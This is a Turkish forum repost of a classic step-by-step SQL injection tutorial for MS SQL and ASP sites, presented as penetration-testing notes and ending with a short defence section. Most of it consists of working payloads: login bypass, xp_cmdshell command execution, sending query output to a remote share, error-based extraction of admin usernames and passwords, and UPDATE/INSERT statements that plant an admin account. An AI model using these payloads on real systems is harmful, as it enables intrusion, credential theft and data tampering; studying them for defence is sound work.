Adım Adım SQL injection Dokuman

  • Konbuyu başlatan Break4Love
  • Başlangıç tarihi

Konu hakkında bilgilendirme

Konu Hakkında Merhaba, tarihinde Teknoloji Dünyası kategorisinde Break4Love tarafından oluşturulan Adım Adım SQL injection Dokuman başlıklı konuyu okuyorsunuz. Bu konu şimdiye dek 3,680 kez görüntülenmiş, 0 yorum ve 0 tepki puanı almıştır...
Kategori Adı Teknoloji Dünyası
Konu Başlığı Adım Adım SQL injection Dokuman
Konbuyu başlatan Break4Love
Başlangıç tarihi
Cevaplar
Görüntüleme
İlk mesaj tepki puanı
Son Mesaj Yazan Break4Love
B

Break4Love

Kullanıcı
14 Nis 2009
En iyi cevaplar
0
0
Adana
www.altarates.com
Özet:
Aşağıdaki makale SQL sorgusu ekleme/değiştirme (SQL Injectioni) saldırıları konusuna yeni başlayanlar için, kullanım ve korunma hakkında bilgiler içermektedir.
Makale SK (sk at scan-associates.net) tarafından hazırlanmıştır.

Detay:
1.0 Giriş
Bir makinanın sadece 80 nolu portu açık olduğunda, ağ güvenlik tarayıcıları işe yarar birşeyler bulamayabilir. Sistem yöneticisi devamlı olarak bu sunucuyu güncellediğini de biliyoruz. Bu durumda Web hack’e yönelmemiz gerekiyor. SQL Injection işletim sistemine değil, veritabanından dinamik içerik sunan (ASPi, JSPi, PHPi, CGI vb.) web uygulamalarına karşı gerçekleştirilen bir web hack yöntemidir.

Bu makale yeni birşey sunmamaktadır, SQL Injection konusunda çok sayıda makale vardır ve geniş çapta kullanılmaktadır. Makaleyi yazmamızın sebebi sızma-testi çalışmalarımızda kullandığımız bazı SQL Injection metodlarını dokümante etmek ve başkalarının da işine yaraması. Bölüm 9.0 daki, daha fazla bilgiyi nereden edinebilirim kısmına göz atmayı unutmayın.

1.1 SQL Injection nedir?
Web sayfalarına gönderilen girdilere SQL sorgu/komut’ları enjekte etme taktiğidir. Çoğu web uygulaması web kullanıcısından parametreler alır ve veritabanına SQL sorguları yapar. Örneğin, bir kullanıcı login olurken, web sayfası kullanıcının girdiği kullanıcı adı ve şifreyi alarak geçerli olup olmadığını kontrol için SQL veritabanına sorgular. SQL Injection ile, özel hazırlanmış bir kullanıcı adı ve/veya şifre alanı ile SQL sorgusunda değişiklik yaparak farklı sonuçlar elde edebiliriz.

1.2 Neye ihtiyacımız var?
Herhangi bir web tarayıcısı (browser)

2.0 Neye bakmalıyız?
Veri göndermenize izin veren sayfalara bakın, ör: login sayfası, arama sayfası, görüş bildirme formları vs. Bazen HTML sayfaları ASP sayfasına parametreleri göndermek için POST metodunu kullanır. Bu durumda URL’de parametreleri göremezsiniz. Fakat HTML kaynak koduna bakıp FORM tag’lerini kontrol edebilirsiniz. Buna benzer birşeyler bulabilirsiniz:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

<FORM> ve </FORM> tag’leri arasındaki herşey işimize yarayabilecek potansiyel parametrelerdir (exploit etmek için).

2.1 Ya hiç input kabul eden sayfalar bulamazsak?
ASP, JSP, CGI veya PHP vb. sayfalara göz atın. Aşağıdaki gibi parametre kabul eden sayfaları bulmaya çalışın:
http://duck/index.asp?id=10

3.0 SQL Injection’dan etkilenip etkilenmediğini nasıl test edebilirim?
İlk olarak tek bir tırnak işareti ekleme taktiğini deneyin:
olympos’ or 1=1--

Kullanıcı adı veya şifre girişinde, hatta URL’de deneyin. Örnek:
- Login: olympos’ or 1=1--
- Pass: olympos’ or 1=1--
- http://duck/index.asp?id=olympos’ or 1=1--

Eğer bunu "hidden" alanında yapmanız gerekirse, HTML sayfasını kendi makinanıza indirip kaydedin. Daha sonra bu dosya içerisinde URL ve hidden alanını değiştirin. Örnek:

<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="olympos’ or 1=1--">
</FORM>

Eğer şansınız varsa geçerli bir kullanıcı adı şifre olmadan siteye login olabileceksiniz.

3.1 Fakat neden ’ or 1=1-- ?
’ or 1=1-- in neden önemli olduğuna bir örnekle bakalım. Login’i atlatmaktan başka extra bilgiler de edinilebilir. Aşağıdaki gibi bir asp sayfası düşünün:
http://duck/index.asp?kategori=yemek

URL’deki ’kategori’ bir değişken ismidir, ve ’yemek’ bu değişkene atanan değerdir. Bunu gerçekleştirmek için aşağıdaki gibi bir ASP kodu kullanılır:

v_kat = request("kategori")
sqlstr = "SELECT * FROM urunler WHERE PKategori=’" & v_kat & "’"
set rs=conn.execute(sqlstr)

Burada görüldüğü gibi değişkenimiz v_cat değişkenine atanıyor ve SQL sorgusu aşağıdaki gibi oluyor:

SELECT * FROM urunler WHERE PKategori=’yemek’

Sorgu WHERE şartına (’yemek’) uygun olarak bir veya daha fazla sonuç döndürecektir.

Şimdi URL’yi aşağıdaki değiştirdiğimizi varsayalım:
http://duck/index.asp?kategori=yemek’ or 1=1--

Böylece v_cat değişkenimiz "yemek’ or 1=1--" oldu, Eğer bu SQL sorgusunda kullanılırsa:
SELECT * FROM urunler WHERE PKategori=’yemek’ or 1=1--’

Bu sorgu, PKategori ’yemek’ değerine sahip olsa da olmasa da urunler kategorisindeki tüm verileri döndürecektir. Çift - işareti (--) MS SQL sunucusuna bu işaretlerden sonra gelen tüm girdileri göz ardı et anlamına gelir. Bu sayede en sonda kalan tek tırnak’tan (’) kurtulunmuş olur. Bazen iki - yerine tek bir # işareti de kullanılabilmektedir.

Bununla beraber, eğer SQL server değilse, veya sorgunun geri kalanınından kurtulamıyorsanız, aşağıdakini de deneyebilirsiniz:
’ or ’a’=’a
Bu şekilde SQL sorgusu aşağıdaki gibi olur:
SELECT * FROM urunler WHERE PKategori=’yemek’ or ’a’=’a’
Bu da aynı sonuçları dönecektir.
SQL sorgusuna bağlı olarak aşağıdakileri de deneyebilirsiniz:
or 1=1--
" or 1=1--
or 1=1--
’ or ’a’=’a
" or "a"="a
’) or (’a’=’a

4.0 SQL Injection ile uzaktan nasıl komut çalıştırabilirim?
SQL komutu eklemek genelde istediğimiz SQL sorgusunu çalıştırabilmek demektir. MS SQL sunucusunun varsayılan kurulumları Windows’daki Administrator erişimine eşit olan SYSTEM kullanıcısı ile çalışır. Bu sayede master..xp_cmdshell gibi stored procedure’leri kullanarak uzaktan komut çalıştırabiliriz:

’; exec master..xp_cmdshell ’ping 10.10.1.2’--

Eğer tek tırnak (’) çalışmazsa çift tırnak (") kullanın.

Noktalı virgül o anki SQL sorgusunu sonlandırır ve yeni bir SQL komutu başlatabilmenizi sağlar. Komutun başarılı olarak çalışıp çalışmadığını kontrol için 10.10.1.2 IP adresinde ICMP paketlerini dinleyebilirsiniz:
#tcpdump icmp

Eğer sunucudan ping istekleri almazsanız, yetki hatası mesajları alırsanız sistem yöneticisinin bu stored procedure’ler için web kullanıcıları yetkilerini ayarlamış olması söz konusudur.

5.0 SQL sorgumun çıktısını nasıl alırım?
sp_makewebtask ile sorgunuzu HTML’e yazdırabilirsiniz:
; EXEC master..sp_makewebtask "\\\\10.10.1.3\\paylasim\\sorgu.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

Fakat hedef IP’nin "paylasim" klasörünü herkesin erişimine (yazma yetkisi ile) açmış olması gerekiyor.

6.0 ODBC hata mesajları ile veritabanından veriler nasıl alınır?
MS SQL Sunucusunu ürettiği hata mesajları ile istediğimiz verileri alabiliriz. Örneğin aşağıdaki sayfada deniyelim:
http://duck/index.asp?id=10

Integer 10 değerine veritabanındaki başka bir string’i UNION ile getirmeyi deneyelim:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Sistem tablosu INFORMATION_SCHEMA.TABLES sunucudaki tüm tablolar hakkında bilgi içerir. TABLE_NAME alanı veritabanındaki her tablonun isim değerini içerir. Bunu seçmemizin sebebi varolduğuna emin olmamız. Sorgumuz:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
Bu sorgu veritabanındaki ilk tablo ismini döndürecektir. Bu isim değerini (string) rakam olan (integer) 10 değerine UNION ile birleştirdiğimiz, MSQL Sunucusu bir string değerini (nvarchar) integer’e çevirmeye çalışacaktır ve nvarchar’ı int’e çeviremediği için hata ile sonuçlanacaktır. Sunucu aşağıdaki hata mesajını döner:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’table1’ to a column of data type int.
/index.asp, line 5

Hata mesajı bize değerin rakama çevirilemediğini belirtiyor. Bu durumda sunucudaki ilk tablo isminin "table1" olduğunu görmüş olduk.

Bir sonraki tablo ismini öğrenmek için aşağıdaki sorguyu çalıştırırız:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (’table1’)--

Hatta LIKE şartını da kullanabiliriz:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ’%login%’--

Çıktı:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’admin_login’ to a column of data type int.
/index.asp, line 5

Burda ’%login%’ SQL sunucusunda %login% olarak görünecektir. Bu durumda kriterimize uyan ilk tablo ismini edinmiş oluyoruz, "admin_login".

6.1 Bir table’daki tüm kolon isimlerini nasıl alırız?
Bir table’daki tüm kolon isimlerini almak için yine yararlı başka bir table olan INFORMATION_SCHEMA.COLUMNS table’ını kullanabiliriz:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’--

Çıktı:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’login_id’ to a column of data type int.
/index.asp, line 5

İlk kolon ismini öğrendiğimize göre NOT IN () kullanarak bir sonraki kolon ismini de öğrenebiliriz:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’)--

Çıktı:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’login_name’ to a column of data type int.
/index.asp, line 5

6.2 İstediğimiz verileri nasıl alırız?
Önemli bazı tabloları ve kolonlarını öğrendikten sonra aynı teknik ile istediğimiz verileri getirebiliriz:
Öncelikle admin_login tablosundaki ilk login_name değerini getirelim:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Çıktı:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’neo’ to a column of data type int.
/index.asp, line 5

Artık "neo" login ismine sahip bir yönetici hesabı olduğunu biliyoruz. Son olarak veritabanından "neo" kullanıcısının şifresini getirelim:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’--

Çıktı:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’m4trix’ to a column of data type int.
/index.asp, line 5

Artık kullanıcı adı "neo" ve şifre "m4trix" ile login olabiliriz.

6.3 Rakam içeren string değerlerini nasıl alırız?
Yukarıda belirtilen tekniğin bazı sınırlamaları var. Eğer geçerli bir rakam içeren (0 ile 9 arası karakterler) bir yazıyı rakama çevirmeyi denersek herhangi bir hata mesajı alamayız. Örnek olarak, şifresi "31173" olan "trinity" kullanıcısı için deneme yapmış olsak:
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’--

Muhtemelen "Sayfa bulunamadı" hatası alırız. Sebebi "31173" şifresinin rakama dönüştürülebilir olması ve geçerli bir UNION sorgusu olduğu için SQL sunucusu ODBC hata mesajı vermeyecektir.

Bu problemin üstesinden gelmek için, rakam içeren verinin arkasına bazı harfler ekleyerek dönüşüm işleminin başarısız olmasını sağlayabiliriz:
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b’%20morpheus’) FROM admin_login where login_name=’trinity’--

Şifreye istediğimiz karakterleri eklemek için basitçe + işaretini kullandık (+ nın ASCII kod değeri = 0x2b). Mevcut şifreye ’(boşluk)morpheus’ ekliyoruz. Böylece dönen veri ’31173’ yerine ’31173 morpheus’ olacak. convert() fonksiyonunu kendimiz çağırarak ’31173 morpheus’ değerini integer’e dönüştürmek istediğimizde SQL sunucusu ODBC hata mesajı verecektir:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’31173 morpheus’ to a column of data type int.
/index.asp, line 5

Artık ’trinity’ kullanıcı adı ve ’31173’ şifresi ile de login olabiliyoruz.

7.0 Veritabanına nasıl veri ekleyebilir, güncelleyebilirim?
Bir tablonun tüm kolon isimlerini elde ettiğimizde artık UPDATE ile verileri güncellememiz ve hatta INSERT ile tabloya yeni veriler eklememiz de mümkün. Örneğin, neo kullanıcısnın şifresini değiştirmek için:
http://duck/index.asp?id=10; UPDATE ’admin_login’ SET ’password’ = ’newpas5’ WHERE login_name=’neo’--

Veritabanına yeni bir kayıt eklemek için:
http://duck/index.asp?id=10; INSERT INTO ’admin_login’ (’login_id’, ’login_name’, ’password’, ’details’) VALUES (666,’neo2’,’yenisifre’,’NA’)--

Artık neo2 kullanıcı adı ve yenisifre sifresi ile de login olabiliriz.

8.0 SQL Injection’dan nasıl korunabilirim?
Aşağıdaki gibi kullanıcı tarafından belirlenebilecek yerlerde sql sorgularında kullanılabilecek özel karakterleri filtreleyin:
- Kullanıcı tarafından girilen form parametreleri
- URL parametreleri
- Çerez değerleri (cookie)

Nümerik değerleri SQL sorgusunda kullanmadan önce Integer’e dönüştürün. Veya ISNUMERIC kullanarak integer olduğuna emin olun.
SQL sunucusu servisini çalıştıran kullanıcının yetkilerini ayarlayın.
Kullanmadığınız stored procedure’leri silin:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

9.0 Daha fazla bilgi nereden edinebilirim?
SQL Injection konusunda ilk karşılaştığımız doküman Rain Forest Puppy’nin PacketStorm’u nasıl hack ettiğini anlattığı dokümandı:
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

ODBC hata mesajlarından bilgi toplama hakkında harika bir doküman:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litch...

Çeşitli SQL sunucularındaki SQL Injection’lar hakkında güzelbir özet:
http://www.owasp.org/asac/input_validation/sql.shtml

Sensepost’un SQL Injection ile ilgili dokümanı:
http://www.sensepost.com/misc/SQLinsertion.htm

Diğer dokümanlar:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.olympos.org/belgeler/sql-injection/adim-adim-sql-injection-93...
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
http://www.olympos.org/belgeler/sql-injection/xss-ve-sql-injection-ataklarindan-korunma-24154.html
http://www.olympos.org/belgeler/asp/asp-de-sql-injection-ataklarindan-korunmak-1-67313.html
 
Üst